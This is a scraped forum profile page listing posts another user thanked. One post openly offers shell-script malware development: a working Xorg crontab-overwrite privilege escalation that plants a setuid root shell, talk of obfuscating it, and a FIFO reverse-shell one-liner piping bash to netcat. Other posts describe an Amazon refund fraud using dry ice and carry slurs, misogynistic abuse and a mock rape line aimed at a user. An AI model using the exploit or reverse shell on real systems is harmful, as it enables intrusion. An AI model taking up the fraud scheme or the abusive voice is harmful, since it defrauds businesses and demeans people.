User Controls

  1. 1
  2. 2
  3. 3
  4. ...
  5. 33
  6. 34
  7. 35
  8. 36
  9. 37
  10. 38
  11. ...
  12. 40
  13. 41
  14. 42
  15. 43

Posts That Were Thanked by Cowboy2013

  1. Sophie Pedophile Tech Support
    Originally posted by Cowboy2013 You’re on a coke binge planning on blowing shit up. You’re living the life my friend.

    Then again I don’t really appreciate my drug induced crimes as much as my sober ones.

    Lol, good point on both counts.
    The following users say it would be alright if the author of this post didn't die in a fire!
  2. Sophie Pedophile Tech Support
    Welcome to another edition of Sophie's Cyber Shenanigans. This thread, i got some unconventional ways to work on *Nix based malware. And a couple questions for the level 97 shell script wizards.

    So i am experimenting with shell scripts, to find out what is and isn't viable should i want to create a shell script based malware for loonix. Why shell script? They're easily obfuscated, a bunch of utils have PE/Static binary formats you can bring along, or deploy remotely, and all distros have `Sh` and almost always `Bash` as far as i am aware.

    What's more, shell scripts, allow one to invoke commands and operations from any scripting lang that have their interpreter installed on the distro you are targeting 'out of the box' as it. Which tend to be quite a few.

    Chances are you'll have access to: Perl, Python, Lua, TclSh, M4(Plus other Macro 'langs') and if you're lucky PHP, Ruby, Node and so on and so forth.

    Another benefit of using `Sh` or `Bash` is that you don't have to worry about compatibility issues. Should you want to make use of payloads written in let's say C, you have the opportunity to perform Recon simply with the `uname -svm` command and then you'll have the proper architecture and kernel version. Which is great to know if you want to write an exploit for the system you're on.

    Here's an example.


    #!/bin/bash


    # There are a bunch of vulns in the Xorg server and related utils like
    #
    # X.Org xorg-x11-xfs - Local Race Condition
    # xorg-x11-server - 'inittab Local Privilege Escalation
    #
    # And much more, we're gonna do the second one as an example
    #
    # When ##!!## occurs in the script i got some annotations below
    #
    cat << EOF > /tmp/x_orgasm
    cp /bin/sh /usr/local/bin/pwned ##!!##_1
    echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
    gcc /tmp/pwned.c -o /usr/local/bin/pwned ##!!##_2
    chmod 4777 /usr/local/bin/pwned
    EOF

    chmod +x /tmp/x_orgasm


    # prepare your anus
    cd /etc
    Xorg -fp "* * * * * root /tmp/x_orgasm" -logfile crontab :1 & ##!!##_3
    sleep 5
    pkill Xorg ##!!##_4

    sleep 120

    ls -l /etc/crontab*
    ls -l /usr/local/bin/pwned

    # Start elevated Sh
    /usr/local/bin/pwned


    ##!!##_1
    Before you say: you can't just copy /bin/sh. Well we don't really need to the line after that builds a Sh shell too.
    If you're afraid we won't have permissions for `gcc` here's something that'll do exactly the same with UID 0.


    Alternatively we could ship a shell in Asm with the payload up top.

    ##!!##_2

    /tmp and some of the other directories featured here get mounted as NOSUID which is good. Because NOSUID beats root.

    /usr/local/bin is part of the $PATH and has MODE 2775/drwxrwsr-x


    ##!!##_3

    The operation here is what triggers the bug. Without getting too much into the weeds killing Xorg at ##!!##_4 with pkill will cause inittab to retart the cronjob related to Xorg that we changed with the operation we ran previously which then starts our 'pwned' Sh with root privileges.

    Obfuscation

    There's tools to obfuscate bash. Which is great. Here's an example of this same script obfuscated with the methods below.


    String/Hex Hash, 1 Iteration
    Token/ForCode, 1 Iteration


    Find the result here

    Or if you prefer a picture check the spoiler out below.




    Anyway, i hope you found that informative. However before you go i do actually have a question for the level 97 shell script wizards.

    I want to have a function in a shell script that i can call with different commands, so `cmd_func cat /etc/passwd`. My current implementation looks like this:


    #!/usr/bin/env -S sh\_"umask\_700"\_-f
    # BTW This is legal right ^
    #
    # I'm U_masking because i am writing stuff out
    # Under a specific user account

    buff_ops()
    { # I want to run it through a FIFO pipe/buffer in fact it is a requirement.
    cmd=$0
    arg=$1
    mknod u_dev p && cat < `read -t (${cmd $'\0' arg})` 0<u_dev | /bin/bash 1>u_dev
    };

    buff_ops CMD ARG # <- is what i want


    I figured it should be good since stuff like this works also:

    rm -f x; mknod x p && nc 192.168.1.10 1337 0<x | /bin/bash 1>x


    Thicc threads niggas. One on low level security and dev incoming soon as well.
    The following users say it would be alright if the author of this post didn't die in a fire!
  3. Kodi is still a thing
    The following users say it would be alright if the author of this post didn't die in a fire!
  4. I had a 4 day old boiled egg for breakfast.
    The following users say it would be alright if the author of this post didn't die in a fire!
  5. Donald Trump Black Hole
    This is genius - when returning electronics to amazon you put dry ice into a box and send it, making sure to insure it and get proof of postage, including weight. The dry ice evaporates while the box is in transit, so amazon receive an empty box, and assume the item was stolen in transit.

    https://sinister.ly/Thread-Amazon-advance-refund--131758
    The following users say it would be alright if the author of this post didn't die in a fire!
  6. by legal I mean non regulated
    The following users say it would be alright if the author of this post didn't die in a fire!
  7. aldra JIDF Controlled Opposition
    Originally posted by rabbitweed Yeah all those Americans getting in rafts and escaping Miami to live in Cuba 'cause there's no depression.

    You're full on retarded sometimes.

    it's almost like blockading the country for 50 years makes life difficult for people
    The following users say it would be alright if the author of this post didn't die in a fire!
  8. Originally posted by Cowboy2013 If it’s not too illegal what is it? This is one reason to have a family too. You need a backup purpose though.







    I’ve been having one since I was about 24.

    meh. thats notthing. mine started at 18.

    top that,
    The following users say it would be alright if the author of this post didn't die in a fire!
  9. I get my news from robotic algorithms that know I am disillusioned with the world and only care about food, video games and local stuff.

    The following users say it would be alright if the author of this post didn't die in a fire!
  10. Donald Trump Black Hole
    Cuba is in every way better off than America.

    Cubans don't have massive depression, they don't have fentanyl overdoses, they don't have endless wars, they don't have massive homelessness, they don't have healthcare bankruptcies, they don't have BLM.

    Americans ought to be shilling for revolution in America instead.
    The following users say it would be alright if the author of this post didn't die in a fire!
  11. Originally posted by Cowboy2013 Idk if there is any user title past black hole but candy’s shouldn’t be changed. She’s three of them.

    hers shpuld be changed to black holessssss.
    The following users say it would be alright if the author of this post didn't die in a fire!
  12. RIPtotse victim of incest [my adversative decurved garbo]
    Manson rules

    We’re all stars now in the dope show

    Seen him live with Alice cooper was good
    The following users say it would be alright if the author of this post didn't die in a fire!
  13. POLECAT POLECAT is a motherfucking ferret [my presentably immunised ammonification]
    SHE GONNA SEND U A DIK PIC NOW
    The following users say it would be alright if the author of this post didn't die in a fire!
  14. Originally posted by BeeReBuddy When Candyrein first came it was the moment she found out I was a white guy.
    I made the mistake of advertising the fona-fone and she blew it up.
    Back then I was on a pay as you go plan and I paid dearly.
    That bitch is not funny. She is not interesting. She is not special.
    The only thing she is, is easy.







    What a slut.

    whoa
    The following users say it would be alright if the author of this post didn't die in a fire!
  15. *rapes cnadyrein*
    The following users say it would be alright if the author of this post didn't die in a fire!
  16. Sophie Pedophile Tech Support
    Originally posted by Cowboy2013 U.S. dissident groups or anti-Chinese? Or both?

    Anti-CCP. It goes so far as keeping track of Chinese people who may be sympathetic to the CCP, just to keep them in line. US Dissidents are just convenient for China in terms of destabilization efforts on the US home front.
    The following users say it would be alright if the author of this post didn't die in a fire!
  17. Sophie Pedophile Tech Support
    It's a complex situation and i'm not part of the intel community so i don't have very much to go on. By virtue of my OSS work i have the opportunity to speak with some people who are intel adjacent but NDA's are a thing so what i do hear on occasion is far from the complete picture. To the best of my knowledge there's a bit of an asymmetry between the CCP and US Intel. The CCP is very much focused on espionage of all sorts, corporate, governmental and surveillance of Cinese nationals and dissident groups based out of the US. The CCP does a lot of HUMINT as well, which is a bit like the spy stuff you see in the movies.

    Another notable thing the CCP does is work with sentiment analysis, and sentiment manipulation. China is very keen on controlling how the world perceives them and takes active measures to try and influence people to see China in a positive light(Sentiment manipulation)

    China is very good at information warfare. Traditional SIGINT as far as military intel goes is something the US is good in. But that is only one strategic area of interest when it comes to this concept of cyber war, while the CCP fights on multiple fronts as it were. Unfortunately i don't know enough to say whether or not the US Intel Community is equipped from a counter-intelligence perspective to defend against the CCP's style of conducting it's cyber/intel operations.
    The following users say it would be alright if the author of this post didn't die in a fire!
  18. stl1 Cum Lickin' Fagit
    Originally posted by Cowboy2013 I doubt she will post now. She’s kind of mercurial and Alex Jones or somebody has her down in the dumps about Biden ending the world or something. That’s another reason she can’t reproduce too.




    Send her ass to the MAGA thread.
    The following users say it would be alright if the author of this post didn't die in a fire!
  19. The OG niggas will just chase her off anyway like they have 95% of the ones that came from DH.
    The following users say it would be alright if the author of this post didn't die in a fire!
  20. Ooh what's her ASL and how old is she and lication
    The following users say it would be alright if the author of this post didn't die in a fire!
  1. 1
  2. 2
  3. 3
  4. ...
  5. 33
  6. 34
  7. 35
  8. 36
  9. 37
  10. 38
  11. ...
  12. 40
  13. 41
  14. 42
  15. 43
Jump to Top